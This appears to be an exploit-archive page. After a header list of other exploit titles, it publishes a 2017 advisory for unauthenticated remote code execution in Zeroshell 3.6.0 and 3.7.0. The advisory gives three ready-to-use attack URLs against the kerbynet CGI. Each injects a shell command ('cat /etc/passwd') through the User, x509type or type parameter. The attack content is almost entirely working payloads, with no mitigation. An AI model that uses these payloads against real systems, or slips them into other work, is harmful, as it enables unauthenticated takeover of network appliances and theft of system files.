08be47d8e2
3 new exploits Mozilla Firefox < 50.1.0 - Use After Free Cisco Firepower Management Console 6.0 - Post Authentication UserAdd QuoteBook - 'poll.inc' Remote Config File Disclosure QuoteBook - Remote Config File Disclosure PHP-Fusion Mod vArcade 1.8 - (comment_id) SQL Injection Pizzis CMS 1.5.1 - (visualizza.php idvar) Blind SQL Injection PHP-Fusion Mod vArcade 1.8 - 'comment_id' Parameter SQL Injection Pizzis CMS 1.5.1 - Blind SQL Injection Joomla! Component com_xevidmegahd - 'catid' SQL Injection Joomla! Component com_xevidmegahd - SQL Injection DZcms 3.1 - (products.php pcat) SQL Injection DZcms 3.1 - SQL Injection phpMDJ 1.0.3 - (id_animateur) Blind SQL Injection XOOPS Module tadbook2 - 'open_book.php book_sn' SQL Injection phpMDJ 1.0.3 - 'id_animateur' Parameter Blind SQL Injection XOOPS Module tadbook2 - SQL Injection PHP-Fusion Mod the_kroax - 'comment_id' Parameter SQL Injection Social Engine - 'browse_classifieds.php s' SQL Injection PHP-Fusion Mod the_kroax - SQL Injection Social Engine - SQL Injection Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution
71 lines
2.3 KiB
Text
Executable file
71 lines
2.3 KiB
Text
Executable file
####################################################################################################################################
|
|
# Exploit Title: Zeroshell - Net Services Unauthenticated Remote Code Execution | RCE
|
|
# Date: 13.01.2017
|
|
# Exploit Author: Ozer Goker
|
|
# Vendor Homepage: http://www.zeroshell.org
|
|
# Software Link: www.zeroshell.org/download/
|
|
# Version: 3.6.0 & 3.7.0
|
|
####################################################################################################################################
|
|
|
|
Introduction
|
|
|
|
Zeroshell is a small Linux distribution for servers and embedded devices with the aim to provide network services. It is available in the form of live CD or compact Flash image and it can be configured using a web browser. The main features of Zeroshell include: load balancing and failover of multiple Internet connections, UMTS/HSDPA connections by using 3G modems, RADIUS server for providing secure authentication and automatic management of encryption keys to wireless networks, captive portal to support web login, and many others.
|
|
|
|
|
|
Vulnerabilities: Unauthenticated Remote Code Execution | RCE
|
|
|
|
|
|
RCE details:
|
|
|
|
####################################################################################################################################
|
|
|
|
RCE 1
|
|
|
|
URL
|
|
http://192.168.0.75/cgi-bin/kerbynet?Action=StartSessionSubmit&User=%27%26cat%20/etc/passwd%26%27&PW=
|
|
|
|
METHOD
|
|
Get,Post
|
|
|
|
PARAMETER
|
|
User
|
|
|
|
PAYLOAD
|
|
%27%26cat%20/etc/passwd%26%27
|
|
|
|
|
|
####################################################################################################################################
|
|
|
|
RCE 2
|
|
|
|
URL
|
|
http://192.168.0.75/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%26cat%20/etc/passwd%26%27
|
|
|
|
METHOD
|
|
Get
|
|
|
|
PARAMETER
|
|
x509type
|
|
|
|
PAYLOAD
|
|
%27%26cat%20/etc/passwd%26%27
|
|
|
|
|
|
####################################################################################################################################
|
|
|
|
RCE 3
|
|
|
|
URL
|
|
http://192.168.0.75/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22%26cat%20/etc/passwd%26%22
|
|
|
|
METHOD
|
|
Get
|
|
|
|
PARAMETER
|
|
type
|
|
|
|
PAYLOAD
|
|
%22%26cat%20/etc/passwd%26%22
|
|
|
|
|
|
####################################################################################################################################
|